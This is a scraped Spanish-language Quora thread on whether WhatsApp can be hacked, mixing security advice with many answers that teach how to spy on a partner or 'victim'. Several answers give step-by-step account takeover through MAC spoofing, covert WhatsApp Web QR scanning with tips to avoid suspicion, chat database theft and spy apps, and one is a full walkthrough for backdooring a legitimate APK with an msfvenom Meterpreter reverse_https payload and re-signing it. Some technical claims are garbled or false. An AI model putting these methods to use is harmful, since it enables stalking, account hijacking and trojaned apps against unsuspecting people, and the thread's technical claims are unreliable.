¿Se puede hackear WhatsApp?

Hay un total de 61 respuestas en vivo en este hilo y 369 respuestas se han colapsado. Entre 61 respuestas, solo 4–5 respuestas han dado una respuesta objetivamente correcta, el resto son simplemente spam. No te enamores de ellos.

No puede hackear una cuenta de Whatsapp de forma remota simplemente sabiendo el número de alguien. Whatsapp tiene una empresa matriz llamada Facebook y tiene una seguridad muy estricta. Necesitas fuertes habilidades de piratería, máquinas y tácticas muy poderosas para romper el escudo de Whatsapp y si supieras eso, no estarías buscando esto en Quora.

  • Si notas esas respuestas, solo encontrarás videos, enlaces, direcciones de correo electrónico y números de contacto que dicen que te enseñarán a hackear Whatsapp en cuestión de minutos. (¡ Mátame por favor!)
  • La mitad de los enlaces son para desviar el tráfico a sus negocios. Terminarás recibiendo muchos mensajes de spam.
  • Las aplicaciones / sitios web / software que dicen hackear Whatsapp te están engañando. Probablemente sean malware o jueguen con su privacidad. No inicies sesión.
  • Escanear el código QR no es piratear. Mantenga su Whatsapp bloqueado y seguro, siempre estará bien.

Se puede rastrear su Whatsapp si y solo si su Gobierno quiere rastrearlo y hace una solicitud especial a la compañía de Whatsapp. Es realmente un procedimiento largo y generalmente dirigido a funcionarios gubernamentales y celebridades. No realizan un seguimiento para saber si su novia está engañando o no. Ni siquiera hacen un seguimiento por diversión.

[Imagen: retrato de hacker ]

En la era de internet, actúa de manera inteligente.

En primer lugar, no es ético hackear la cuenta de sus socios o comprometer la privacidad. En caso de que aún quiera hacerlo (¡Dios sabe por qué!) Puedo sugerir 3 pasos:

1. Vaya a la carpeta WhatsApp en su teléfono, en esa carpeta de la base de datos de verificación y copie todos los archivos msgcrypt.db. (Verifique los archivos creados recientemente)

2. Una vez que copie esos archivos, necesitará instalar Python en su sistema para descifrar esos archivos. (Esto podría ser realmente complicado, si no tienes experiencia previa o no te interesa la técnica).

3. Las opciones no técnicas pueden ser, copie esos archivos msgcrypt.db en su cuenta de WhatsApp o en alguna nueva antes de activar WhatsApp y luego, una vez que los bits estén activados, podrá ver toda la información previa.

Nota: Los dos primeros pasos tienen éxito garantizado, el tercero puede fallar en algún momento si no se realiza correctamente.

, WhatsApp puede ser pirateado . Pero hasta cierto punto solo.

Recientemente se ha descubierto un exploit en WhatsApp que puede usarse para espiar a cualquiera. Puede ver la actividad en línea de cualquier usuario que desee y para eso solo necesita su número de teléfono vinculado de WhatsApp.

La función de estado “en línea” de Whatsapp se puede usar exactamente para monitorear la actividad en línea del usuario. Cualquiera puede saber cuándo usa WhatsApp, cuándo duerme, su actividad en línea y mucho más. Pero el chat es seguro, ya que WhatsApp utiliza cifrado de extremo a extremo.

¿Como funciona?

Si tiene el número de móvil de alguien en sus contactos y ese número está conectado a WhatsApp, puede ver su actividad en línea. El usuario a quien desea monitorear no necesita guardar su número de contacto.

Solo necesita una computadora portátil, una extensión de Chrome y conocimientos sobre JavaScript. Según el blog, puede escribir un código JavaScript de cuatro líneas que puede controlar su estado en línea. Eso significa que cuando un usuario se desconecta y luego vuelve a conectarse para leer un mensaje, esa acción se registra. Para que necesite crear una extensión de Chrome que supervisará la actividad “en línea” a través de la aplicación web WhatsApp.

Al usar este registro de actividad en línea, se puede hacer una referencia cruzada de la persona con la de otra persona. Y se puede saber si los dos están hablando entre sí.

Digamos que una persona se conecta para enviar un mensaje, y otra persona aparece en el mismo momento. Si esto continúa por un tiempo, se puede inferir que los dos están en una conversación.

Si el monitoreo de datos se realiza a una escala mayor, las consecuencias pueden causar escalofríos en la columna vertebral. Se puede utilizar para satisfacer el hambre de las agencias de publicidad que babean sobre su información, incluso mientras están dormidos. En un escenario hipotético, incluso puede crear una empresa que ejecute un servicio para devolver la información de WhatsApp de las personas a su número de teléfono.

Desafortunadamente, no hay forma de evitar que otros te espíen también. Esta falla se puede resolver si WhatsApp ofrece una nueva función para elegir a los usuarios que pueden ver su estado “en línea” igual que la función existente para elegir a los usuarios que pueden ver su estado “visto por última vez”.

Fuente : pirateo de WhatsApp – Verifique la actividad en línea de cualquier usuario

Para esto necesitará el teléfono de la víctima.

1) Desinstale Whatsapp de su teléfono
2) Obtenga el teléfono de su víctima y anote su dirección MAC (Configuración inalámbrica-> Avanzado-> Dirección MAC)
3) Clone la dirección MAC en su dispositivo. (En Android, instale BusyBox y el emulador de terminal. En el terminal, escriba “ip link show” para ver una lista de interfaces. Identifique la que tiene su dirección MAC; por ejemplo, consideremos la interfaz como eth0. emulador de terminal, ingrese “IP Link set eth0 address XX: XX: XX: XX: XX: XX” y “ip link set eth0 broadcast XX: XX: XX: XX: XX: XX”)
4) Ahora instale Whatsapp en su teléfono e ingrese el número de teléfono de su objetivo.
5) Cuando Whatsapp comience su proceso de confirmación, coloque su teléfono en modo avión (esto obligará a Whatsapp a omitir el proceso de confirmación)
6) Ahora puede ver y recibir los mensajes de su víctima.

Por último, pero no menos importante, no use este conocimiento con fines traviesos 😉

Te diré aquí dónde se pueden encontrar todos los chats, conversaciones y otros datos de WhatsApp o cómo se pueden robar.

1) Whatsapp envía un código de confirmación en su número registrado … Si alguien envía el código a su celular y lo mira solo entonces se puede iniciar su whatsapp

2) Existe la opción de escanear su código QR y usar WhatsApp a través de WhatsApp Web en el que sus mensajes también se cargan en la PC

3) Las conversaciones de Whatsapp están respaldadas en su carpeta de WhatsApp en la tarjeta de memoria como un .dbcrypt
archivo . Entonces, a menos que alguien robe ese archivo a través de aplicaciones de uso compartido de bluetooth, usb o wifi, sus chats están seguros.

4) Existe la opción de enviar por correo electrónico su conversación con una persona en particular a través de su teléfono celular a su correo electrónico.

5) Por último, pero no menos importante, está la carpeta whatsapp en sdcard> android donde se almacenan los archivos temporales y la configuración.

Ahora que le he dicho todas las formas de buscar una conversación, puede tenerlas en cuenta y proteger su privacidad.

Es muy fácil hackear su información ya que WhatsApp no ​​protege sus datos.
WhatsApp ahora está trabajando para proteger sus datos, pero esto llevará algún tiempo y hasta entonces debe ser un poco más cauteloso con su teléfono.
WhatsApp es uno de los servicios de mensajería más utilizados en todo el mundo. Este servidor tiene muy poca seguridad y, por lo tanto, se puede piratear muy fácilmente. Recomiendo usar alguna aplicación de Android como la aplicación de privacidad Leo desarrollada por Leomaster. Hay dos formas de hackear un dispositivo de WhatsApp: a través del número IMEI y a través de Wi-Fi. WhatsApp no ​​tiene un servidor muy seguro, así que evite usar WhatsApp cuando esté conectado a Wi-Fi.
En general, los dispositivos Android y Apple que usan WhatsApp no ​​tienen ninguna seguridad. Los dispositivos Blackberry son extremadamente seguros ya que usan su propio servidor, mientras que otros usan el servidor WhatsApp.
Por lo tanto, generalmente, evite usar Wi-Fi para WhatsApp, siempre y cuando sea posible.

Actualización – 14/11/2017 : para cumplir con las políticas de Quora, estoy eliminando los métodos de espionaje en Whatsapp y también estoy eliminando los comentarios relacionados.

Si, puede ser hackeado

Descargo de responsabilidad : el siguiente contenido está destinado a informar a los usuarios sobre las vulnerabilidades en Whatsapp, de ninguna manera estoy alentando a los usuarios a romper la privacidad de alguien.

Es relativamente fácil para una persona espiar el whastapp de alguien si tiene acceso al teléfono de la víctima.


Las siguientes son posibles formas en que un pirata informático puede espiar su Whatsapp (no son métodos):

  1. Las personas pueden leer su mensaje simplemente copiando el archivo de la base de datos de Whatsapp y la clave de cifrado de su teléfono y con la ayuda de algún software, pueden leerlo.
  2. Usando Python y otras herramientas para leer la sesión de chat de WhatsApp.
  3. Al suplantar la dirección MAC (dirección de control de acceso a medios), cada teléfono adaptador de red WiFi tiene un identificador único de 12 caracteres llamado dirección MAC. Los hackers pueden usar la dirección MAC de su teléfono y pueden duplicar su whatsapp en su dispositivo.

Cómo proteger su cuenta de WhatsApp:

  • No entregue su teléfono a una persona en la que no confíe.
  • mantenga su bandeja de entrada de mensajes segura con un bloqueo separado, para que ninguna otra persona pueda leer su mensaje desde la bandeja de entrada de texto.
  • Si alguien está usando Whatsapp web con su número, vaya a la configuración de su Whatsapp y haga clic en “cerrar sesión de todos los navegadores” o alguna opción similar estará allí.
  • Habilite la verificación en dos pasos de la siguiente manera:
  • Para habilitar la verificación en dos pasos, abra WhatsApp> Configuración > Cuenta > Verificación en dos pasos > Habilitar .
  • Este paso le pedirá que cree una contraseña y evitará que otra persona use su número para la verificación de Whatsapp.

¿Te preocupa que tu cuenta de WhatsApp esté protegida o no ? En caso afirmativo, no se preocupe porque puede proteger fácilmente su cuenta de WhatsApp siguiendo mis pasos.

Ahora voy a compartir con ustedes algunos métodos valiosos. Al utilizar estos métodos, puede proteger su cuenta de WhatsApp fácilmente. Si está pensando que se puede hackear Whatsapp de forma remota o se puede hackear Whatsapp en Android o se puede hackear Whatsapp en iPhone, luego de leer mis métodos, puede asegurarse de que su Whatsapp esté seguro y protegido.

Solución

Verifique su registro web de Whatsapp desde su cuenta principal de Whatsapp. Si encontró algún dispositivo no autorizado allí, simplemente elimine todos esos dispositivos no autorizados de Whatsapp Web. Al eliminar todos los dispositivos, puedes protegerte de este Whatsapp pirateado.

A2A.

¿Puede? Seguro. Todo lo que sea accesible a través de Internet tiene una vulnerabilidad en alguna forma de otra. Ya sea una vulnerabilidad técnica o social, puede ser explotada.

Si las personas encuentran fallas de seguridad en el software, lo explotan de ciertas maneras y lo abusan por sus intenciones maliciosas, no veo ninguna razón por la que eso no pueda hacerse. Sin embargo, probablemente sea un problema muy complicado ingresar a la aplicación, y las múltiples capas de seguridad que lo protegen no lo hacen más fácil.

Otro enfoque es social. Phishing u otra forma de obtener credenciales de los empleados o acceso a dispositivos de desarrollo. Si no puede hacerlo directamente, siempre puede intentar otro enfoque. Supongo que también hay medidas de seguridad para este problema. Pero no todo es 100% seguro.

Además, recomiendo leer otras respuestas aquí, ya que son igualmente perspicaces.

tp: //apps1play.blogspot.in/2015/08/hacking-whatsapp-in-easy-five-step.html? m = 1

Hackear WhatsApp en cinco pasos fáciles.
Whatsapp introdujo recientemente su web.WhatsApp.com. Si lo piensa con inteligencia con el navegador Crome, Opera o Firefox, puede piratear o puede decir que puede ejecutar dos cuentas de WhatsApp en un dispositivo móvil.
Así que solo siga los siguientes pasos a continuación:

Abra web.WhatsApp.com en el navegador Chrome, Opera o Firefox.

2 Cambie al sitio de escritorio.

3 Aquí tienes, tienes el código QCR en tu mano, ¿qué más necesitas?

4 Answer es un teléfono para ser hackeado. Así que toma prestado el teléfono de tu amigo por 30 segundos.

5 Escanee el código QCR que hackeó con las opciones de menú de WhatsApp “WhatsApp web”, se encenderá la cámara para escanear, solo escanee.

Ahora ejecutará WhatsApp de sus amigos en su navegador, abra una nueva pestaña de incógnito y ejecute una cuenta más.

Al usar tres navegadores diferentes y su pestaña privada como incógnito en Chrome, puede hackear 6 ID de WhatsApp en un teléfono inteligente. Y una de sus 7 cuentas totales de WhatsApp.

¿No es asombroso?

No necesita mucho trabajo agitado, como copiar la dirección Mac y luego estropear su teléfono cambiando su dirección Mac, desinstalar, reinstalar WhatsApp Etc .. Etc ..

Y sobre todo esto no es un truco … Lol. (-_ *)

Es solo una característica agregada por WhatsApp. Que podría ser mal utilizado.

Los desarrolladores de WhatsApp pueden considerar mi publicación como un comentario para mejorar esto y podrían hacerlo basado en IP.
Feliz chateando 🙂

En primer lugar, ¡no es un trabajo ético hackear la cuenta de otros!

Para esto necesitará el teléfono de la víctima.

1) Desinstale Whatsapp de su teléfono
2) Obtenga el teléfono de su víctima y anote su dirección MAC (Configuración inalámbrica-> Avanzado-> Dirección MAC)
3) Clone la dirección MAC en su dispositivo. (En Android, instale BusyBox y el emulador de terminal. En el terminal, escriba “ip link show” para ver una lista de interfaces. Identifique la que tiene su dirección MAC; por ejemplo, consideremos la interfaz como eth0. emulador de terminal, ingrese “ip link set eth0 address XX: XX: XX: XX: XX: XX” y “ip link set eth0 broadcast XX: XX: XX: XX: XX: XX”)
4) Ahora instale Whatsapp en su teléfono e ingrese el número de teléfono de su objetivo.
5) Cuando Whatsapp comience su proceso de confirmación, coloque su teléfono en modo avión (esto obligará a Whatsapp a omitir el proceso de confirmación)
6) Ahora puede ver y recibir los mensajes de su víctima.

¡No uses este conocimiento para propósitos traviesos!

SOLO PARA FIN DE LA EDUCACIÓN

Puedes hackear qué aplicación es simple, todo lo que necesitas es un sistema operativo Kali usando meterpreter

Aquí están los pasos básicos

1.Generar la carga útil de Meterpreter
2. Descompilar la carga útil y el apk original
3. Copie los archivos de carga útil a la apk original
4.Inyecte el gancho en la actividad apropiada del apk original
5.Inyecte los permisos en el archivo AndroidManifest.xml
6.compila el apk original
7. Firma el apk con Jarsigner

GENERAR LA CARGA DE PAGO:

En primer lugar, tenemos que hacer la carga útil de Meterpreter. Vamos a usar MSFVenom para esto. El comando es

msfvenom -p android / meterpreter / Payload_Type LHOST = IP_Address LPORT = Incoming_Port -o meterpreter.apk

Reemplace Payload_Type por cualquiera de las siguientes cargas disponibles. La función de todas estas cargas útiles es la misma, esencialmente todas son cargas útiles de Meterpreter, la diferencia está solo en el método que utilizan para conectarse a su sistema Kali. Los Payload_Types disponibles son:

1.reversetcp
2.reverse_http
3.reverse_https

Puedes usar cualquiera que quieras, voy a usar reverse_https como ejemplo.

Reemplace IP_Address por la dirección IP a la que se va a conectar la carga útil, es decir, la dirección IP del sistema del atacante. Si va a realizar este ataque a través de una red local (por ejemplo, si la víctima y el atacante están conectados al mismo punto de acceso WiFi), su IP local será suficiente. Para saber cuál es su IP local, ejecute el comando –

ifconfig

Si va a realizar este ataque a través de Internet, debe usar su dirección IP pública y configurar su enrutador correctamente (configurar el reenvío de puertos) para que su sistema sea accesible desde Internet. Para conocer su IP pública, solo google “Mi IP” y Google lo ayudarán.

Reemplace Incoming_Port con el puerto no. que desea que la carga útil utilice para conectarse a su sistema. Este puede ser cualquier puerto válido, excepto los reservados, como el puerto 80 (HTTP). Voy a usar 4895 como ejemplo.

Por lo tanto, ejecute el comando reemplazando las palabras clave con los valores apropiados y MSFVenom generará una carga útil “meterpreter.apk” en el directorio raíz. Tenga en cuenta que especificamos el nombre del archivo de salida usando el argumento “-o meterpreter.apk” en el comando, por lo que si lo desea, también puede nombrar cualquier otra cosa.

Paso 2 DESCOMPILA los APK:

Ahora tenemos que descompilar los APK, para esto vamos a usar APKTool. Descompila el código en un formato bastante legible para humanos y lo guarda en archivos .smali, y también extrae con éxito los archivos .xml. Suponiendo que ya ha instalado la última apktool y también tiene el archivo apk original en el directorio raíz, ejecute los siguientes comandos:

apktool d -f -o payload /root/meterpreter.apk

apktool d -f -o original / root / Original_APK_Name

Descompilará la carga útil en “/ root / payload” y el apk original en el directorio “/ root / original”.

Paso 3 COPIE LOS ARCHIVOS DE CARGA DE PAGO:

Ahora tenemos que copiar los archivos de carga útil a la carpeta de la aplicación original. Simplemente vaya a “/ root / payload / smali / com / metasploit / stage” y copie todos los archivos .smali cuyo nombre de archivo contenga la palabra ‘payload’. Ahora péguelos en “/ root / original / smali / com / metasploit / stage”. Tenga en cuenta que esta carpeta no existe, por lo que debe crearla.

Paso 4 INYECTE el GANCHO en el CÓDIGO ORIGINAL .SMALI:

En el paso anterior, simplemente copiamos los códigos de carga útil dentro del apk original, de modo que cuando se recompile el apk original, contendrá la carga útil. Pero eso no significa necesariamente que la carga útil se ejecutará. Para garantizar que la carga útil se ejecute, debemos inyectar un gancho en el código .smali del apk original. Si te estás preguntando de qué estoy hablando este gancho, bueno, esencialmente es un código que intercepta alguna llamada de función específica y reacciona a ella. En este caso, vamos a colocar el gancho para que cuando se inicie la aplicación, también se inicie la carga útil.

Para esto, primero tenemos que averiguar qué actividad, en pocas palabras, las actividades son secciones de código, es similar a los marcos en la programación de Windows que se ejecuta cuando se inicia la aplicación. Podemos obtener esta información del archivo AndroidManifest.xml.

Abra el archivo AndroidManifest.xml ubicado dentro de la carpeta “/ root / original” con cualquier editor de texto. Si conoce HTML, entonces este archivo le resultará familiar. Ambos son esencialmente Lenguajes de marcado, y ambos usan las etiquetas familiares y la estructura de atributos, por ejemplo, Contenido . De todos modos, busque una etiqueta que contenga ambas líneas:

_
_

En una nota al margen, puede usar CTRL + F para buscar dentro del documento en cualquier editor de texto GUI. Cuando localice esa actividad, observe el valor del atributo “android: nombre”. En mi caso, como puede ver en la captura de pantalla a continuación, es “com.piriform.ccleaner.ui.activity.MainActivity”.

Esas dos líneas que buscamos significan que esta es la actividad que comenzará cuando lancemos la aplicación desde el icono del iniciador, y también es una actividad PRINCIPAL similar a la función ‘principal’ en la programación tradicional.

Ahora que tenemos el nombre de la actividad en la que queremos inyectar el gancho, ¡vamos a ello! En primer lugar, abra el código .smali de esa actividad usando gedit. Simplemente abra una terminal y escriba –

gedit / root / original / smali / Activity_Path

Reemplace Activity_Path con el “android: nombre” de la actividad, pero en lugar de los puntos, escriba barra diagonal. En realidad, los códigos pequeños se almacenan en carpetas con el formato en el que se encuentra “android: name”, para que podamos obtener fácilmente la ubicación del código .smali de la manera que lo hicimos. Consulte la captura de pantalla a continuación y obtendrá una idea de lo que estoy tratando de decir.

Ahora busque la siguiente línea en el código smali usando CTRL + F –

; -> onCreate (Landroid / os / Bundle;) V

Cuando lo localice, pegue el siguiente código en la línea al lado:

invoke-static {p0}, Lcom / metasploit / stage / Payload; -> start (Landroid / content / Context;) V

Lo que estamos haciendo aquí es insertar un código que inicia la carga junto con el código existente que se ejecuta cuando comienza la actividad. Ahora, guarde el archivo pequeño editado.

Paso 5 INYECTE los PERMISOS NECESARIOS:

De desarrolladores de Android –

Se proporcionan características de seguridad adicionales más precisas a través de un mecanismo de “permiso” que impone restricciones sobre las operaciones específicas que puede realizar un proceso en particular.

Si no mencionamos todos los permisos adicionales que necesitará nuestra carga útil, no puede funcionar correctamente. Al instalar una aplicación, estos permisos se muestran al usuario. Pero a la mayoría de los usuarios no les importa leer todos esos textos aburridos, por lo que no tenemos que preocuparnos tanto.

Estos permisos también se enumeran en el archivo AndroidManifest encontrado anteriormente. Así que abramos el AndroidManifest.xml de la aplicación original y la carga útil de las carpetas respectivas. Los permisos se mencionan dentro de la etiqueta como un atributo ‘android: name’. Copie las líneas de permiso adicionales del Manifiesto de Android de la carga útil a la aplicación original. Pero tenga cuidado de que no haya ningún duplicado.

Aquí está el Manifiesto de Android de mi aplicación original antes de editarlo:

Después de agregar los adicionales del AndroidManifest de Payload, mi /root/original/AndroidManifest.xml se ve así:

Paso 6 RECOMPILA el APK ORIGINAL:

¡Ahora todas las partes duras están listas! Solo tenemos que recompilar la aplicación backdoored en un apk instalable. Ejecute el siguiente comando:

apktool b / root / original

Ahora tendrá el apk compilado dentro del directorio “/ root / original / dist”. Pero todavía no hemos terminado.

Paso 7 FIRME el APK:

Este también es un paso muy importante, ya que en la mayoría de los casos, no se puede instalar un apk sin firmar. De desarrolladores de Android –

Android requiere que todas las aplicaciones estén firmadas digitalmente con un certificado antes de poder instalarse. Android usa este certificado para identificar al autor de una aplicación, y el certificado no necesita ser firmado por una autoridad de certificación. Las aplicaciones de Android a menudo usan certificados autofirmados. El desarrollador de la aplicación posee la clave privada del certificado.

En este caso, vamos a firmar el apk con la clave de depuración de Android predeterminada. Simplemente ejecute el siguiente comando:

jarsigner -verbose -keystore ~ ​​/ .android / debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA apk_path androiddebugkey

Asegúrese de reemplazar el apk_path en el comando anterior con la ruta a su archivo apk backdoored.

No puedo es exactamente hackear. Pero, si desea acceder a los mensajes de alguien, alguien que usted conoce puede hacerlo fácilmente.

Necesita tener acceso a su teléfono por un minuto y a su computadora portátil.

Cuando tenga acceso al móvil de la persona, simplemente abra http://web.whatsapp.com/ en su computadora portátil. Luego el código QR desde el móvil de la persona. Volla! Todos los mensajes en su computadora portátil.

Pocas cosas a tener en cuenta:

1. Tenga cuidado cuando abra la web de Whatsapp. Si la otra persona también lo usa, aparecerá un error “Whatsapp Web está abierto en otra ventana” si ambos abren simultáneamente. Esto los hará sospechosos.

2. No abra mensajes no leídos. Nuevamente los hará sospechar.

El ejército indio advirtió a los usuarios de WhatsApp que permanezcan alertas en la plataforma de redes sociales, ya que el ejército alegó que los piratas informáticos chinos están apuntando a los usuarios indios para extraer datos personales. El Ejército de la India ha pedido a todos los usuarios de WhatsApp que se mantengan vigilantes y alertas contra tales números desconocidos de +86 que se unen a los grupos de WhatsApp.

Los chinos usan todo tipo de plataformas para penetrar en su mundo digital. Los grupos de WhatsApp son una nueva forma de hackear su sistema. Las empresas chinas tienen una gran influencia en la industria india de TI, con un valor de alrededor de $ 22 mil millones, que el gobierno considera que puede ser mal utilizado.

Uno de sus últimos estilos de ataque es irrumpir en grupos de WhatsApp y luego extraer datos de los usuarios de ese grupo.

Pero, la pregunta es, ¿es realmente posible hackear el grupo de WhatsApp y, de ser así, cómo?

Todos obtenemos pruebas sobre el inconveniente de su seguridad cuando la famosa característica de WhatsApp ‘Eliminar para todos’ salió con fallas importantes recientemente.

Según los investigadores, descubrió que una falla de seguridad importante en el back-end de WhatsApp permite a los piratas informáticos tomar el control de los grupos de WhatsApp y luego robar información, datos de los participantes del chat grupal.

Una vez que un nuevo miembro se une a un grupo de WhatsApp, todos los participantes del grupo comparten sus claves de cifrado con el nuevo miembro, lo que deja una gran puerta abierta para la explotación.

Para esto, los chinos están usando números móviles que comienzan con +86.

¿Cómo puedes mantenerte a salvo de la piratería? Para conocer más detalles sobre la alerta de advertencia del ejército indio, siga el último artículo,

Los hackers chinos que apuntan a WhatsApp para robar datos, el ejército indio advierte a los usuarios: ¡¡Bravery Truth !!

La respuesta es sí, Whatsapp puede ser hackeado. Pero la verdadera pregunta es ¿se puede hackear Whatsapp de una manera simple y accesible para alguien que no sea un experto en tecnología? ¿Es posible que un no programador piratee una cuenta de Whatsapp? La respuesta a eso nuevamente es la misma. No tiene que preocuparse por sus calificaciones para esta tarea, el hecho de que use un teléfono inteligente y sepa cómo realizar funciones básicas en él es suficiente para estar calificado para ello. Así que disipa tu enigma de ‘puede ser hackeado Whatsapp’. Ahora pasando a la siguiente parte, hay tres formas posibles de hacer esto:

  • Suplantación de identidad de Mac : esto implica cambiar la dirección MAC wifi en su teléfono y obtener la suya, también desinstalar WhatsApp en su teléfono mientras hace lo mismo
  • Escaneo del código QR: Esto implica obtener el teléfono del objetivo, ir a la web de WhatsApp en la configuración y escanear el código QR en su escritorio.
  • Spyzie : esta es una aplicación espía que le permite obtener acceso a la funcionalidad del teléfono del objetivo en general.

Ahora los tres métodos son métodos muy efectivos, pero posiblemente el método más efectivo de los tres sería Spyzie.

¡¡¡Gracias!!!

# urstrulytahseen

Seguro..

Hay varios vectores de ataque para WhatsApp como,

  • Suplantación de direcciones Mac.
  • QRLJacking.
  • Usando su código QR para ingresar a su web de WhatsApp.
  • Usando software espía.
  • Robando su carpeta de base de datos de WhatsApp y descifrándola.

También es posible que algún hacker genio encuentre un exploit en WhatsApp. Si la persona está usando la web de WhatsApp, hay muchos más métodos. Nada es 100% seguro. Pero WhatsApp es muy cauteloso sobre su seguridad y puede estar seguro al no dar su teléfono a las personas, al no escanear códigos QR innecesarios y solo instalar aplicaciones desde la tienda de juegos, también debe verificar su calificación y comentarios.

¿Puede ………… .. ser pirateado? pon cualquier cosa en el espacio libre.

Ningún sistema es 100% seguro.

Ninguna red puede ser 100% segura, ciertamente no si es una red en funcionamiento.


¿Por qué no podemos tener un sistema 100% seguro?

  1. Usuarios:
    Imaginemos que el sistema requiere que el usuario cree una contraseña larga y compleja + 1 contraseña de tiempo + huella digital + … etc.
    ¿Qué pasa si un usuario (o administrador del sistema) fue chantajeado? 😀
    ¿Qué sucede si un usuario descarga involuntariamente un malware?
    ¿Qué sucede si se pirateó la computadora / teléfono de un usuario?
    ¿Qué pasa si alguien de adentro decide ganar dinero filtrando algo de inf?
  2. Usabilidad y complejidad:
    Si intentas hacer un sistema con tantos aspectos de seguridad, será difícil usar el xxxx. Por ejemplo, si crea un sistema que requiere más de 20 contraseñas largas y complejas para iniciar sesión, ahora agregue un segundo paso de autenticación que requiere una contraseña de 1 vez que obtiene en su número de teléfono cada vez que inicia sesión. Ahora, ¿qué pasa si el teléfono celular de un usuario fue robado y su contraseña fue capturada de alguna manera ?. Entonces agrega otro procedimiento de seguridad, escojamos la huella digital. ¡Ahora qué pasa si la huella digital del usuario se imprimió en 3D o se omitió con alguna técnica! Agreguemos otro procedimiento de seguridad, agreguemos una autenticación de reconocimiento de voz. ¡Oh, eso tendrá el mismo problema que el último!
    También debemos asegurarnos de que si el usuario estuvo inactivo durante 30 segundos, se desconectará automáticamente y deberá volver a iniciar sesión.
    Echemos un vistazo al software, ¿es muy complejo? Probablemente si. Cuanto más complejo es el Software, más posibilidades hay de que tenga errores.
    ¿Qué pasa con otro tipo de seguridad, el algoritmo de cifrado? Usemos RSA de 4096 bits. Este es un algoritmo muy muy fuerte, por lo que consumirá la potencia de procesamiento de su máquina. Oh, espere (los investigadores descifran el cifrado más difícil del mundo al escuchar los pequeños sonidos producidos por la CPU de su computadora), incluso este algoritmo no es 100 seguro. ¿Deberíamos agregar otro tipo de encriptación?
    ¿Ves cómo va a ser esto? Es una especie de seguridad frente a usabilidad.

El sistema que es 100% seguro no es un sistema funcional.


¿Qué hay de WhatsApp?

¿Te preocupa que la compañía de WhatsApp te esté espiando? Si te importa, entonces deberías estar preocupado.
The Guardian afirmó que WhatsApp tiene una ‘puerta trasera’. Si WhatsApp cambió secretamente las claves de seguridad de un usuario, la compañía podría, según Tobias Boelter, un investigador de criptografía y seguridad de la Universidad de California, ‘revelar sus registros de mensajes, puede otorgar acceso de manera efectiva debido al cambio de claves’ en el solicitud de agencias gubernamentales.

¿Le preocupa que alguien que no sea WhatsApp pueda espiarlo?
Aunque WhatsApp utiliza cifrado de extremo a extremo, lo que significa que solo su dispositivo tiene la capacidad de decodificarlos (que es una buena manera de evitar que sus mensajes sean interceptados durante la transmisión), la copia de seguridad de WhatsApp en su teléfono no está cifrada. Lo que significa que si alguien obtuvo estos archivos de respaldo, toda su conversación anterior quedará expuesta.

Incluso si el WhatsApp en sí era 100% seguro, su teléfono y computadora (puede usar WhatsApp desde el navegador de su computadora) no son 100% seguros. Por lo tanto, es muy probable que un hacker no intente hackear la compañía de WhatsApp y no sea de la compañía de WhatsApp, sino que encontrará una manera de hackear su computadora o teléfono y luego espiar sus conversaciones de WhatsApp.


Veredicto:

WhatsApp como cualquier otro software no es 100 seguro. Es bastante seguro, pero hay aplicaciones de llamadas / mensajes de texto más seguras.

Lo que realmente debe preocupar es la seguridad de su computadora y teléfono inteligente. No todos los lugares en Internet son seguros para navegar. Necesitas tener cuidado.


Si eres alguien interesado en la seguridad de la información, te recomiendo estudiar CompTIA Security +.

La certificación CompTIA Security + es una validación reconocida internacionalmente de habilidades y conocimientos de seguridad a nivel de base. Básicamente te enseña los fundamentos de seguridad de TI. El único requisito previo para este curso es la experiencia de redes o conceptos básicos de redes básicas. Si no está familiarizado con los conceptos básicos de redes, puede aprenderlo estudiando CompTIA Network + .

Para estudiar materiales y capacitación en línea, recomiendo → AlphaPrep.net


Preguntas relacionadas:

  • ¿Para qué se utiliza el puerto 443?
  • Ethernet: ¿Qué sucede si dos dispositivos conectados a Internet tienen la misma dirección MAC? ¿Funcionan bien?
  • ¿Qué es el proceso de DORA en DHCP?
  • ¿Cómo se convierte uno en hacker?
  • ¿Cuáles son los mejores libros, desde un principiante hasta un especialista en seguridad cibernética? ¿Qué idiomas o sitios de práctica recomendarías?
    .

Pregunta de las Comisiones de Estudio del día:

  1. CompTIA A +: se le encargó la construcción de una computadora para juegos. El cliente quiere usar la CPU y la memoria más rápidas posibles. También recomienda usar una matriz RAID para crear un sistema aún más rápido. ¿Qué tipo de RAID recomendaría usar, teniendo en cuenta que la redundancia no es una prioridad?
  2. Red +: ¿Cuál de los siguientes ataques de seguridad ocurre cuando un atacante explota una vulnerabilidad conocida en una aplicación (por ejemplo, un error en una aplicación que permitió que esa aplicación escribiera en un área de memoria dedicada a una aplicación diferente), lo que podría causar otra aplicación para bloquearse?
  3. Seguridad +: ¿Cuál de los siguientes métodos está más estrechamente relacionado con la inyección de DLL?
  4. CCNA: ¿Cuáles son los acrónimos correctos para referirse a las funciones y protocolos inalámbricos en este diseño?
  5. CCNP: ¿Qué configuración permitiría el filtrado de rutas OSPF (ID de proceso 10) cuando se redistribuye en EIGRP (AS 100) basado en ACL 50?

Vota si encuentras esto útil.

Comenta si tienes una pregunta o tienes algo que compartir.

Siga si está interesado en leer más sobre computadoras y redes.

Mantente a salvo .. Que tengas un buen día 🙂

Paso. 1 En primer lugar, desinstale completamente WhatsApp de su teléfono.
Paso. 2 Obtenga el teléfono de otra persona al que desea acceder.
Paso. 3 Y encuentre la dirección MAC de ese teléfono. Será en seis pares como … 01: 43: 65: 87: 98: cb
Para Android, vaya a Configuración – Acerca del teléfono – Estado – Dirección MAC de Wi-Fi.
Para iPhone, vaya a Configuración – General – Acerca de – Dirección de Wi-Fi.
Para Windows phone, encuentre esto en Configuración – Acerca de – Más información – Dirección MAC.
Para BlackBerry, vaya a Opciones – Dispositivo – Información de dispositivo y estado – WLAN MAC.
Paso. 4 Ahora encuentre también su dirección MAC y guarde ambas direcciones MAC en cualquier lugar seguro.
Paso. 5 Otro paso es instalar aplicaciones de suplantación de MAC para cambiar la dirección MAC de su teléfono. Para iPhones, instale MacDaddy X o WifiSpoof. Y para Android, puede instalar algunas aplicaciones gratuitas como BusyBox y Terminal Emulator , que están disponibles en Google Play Store.
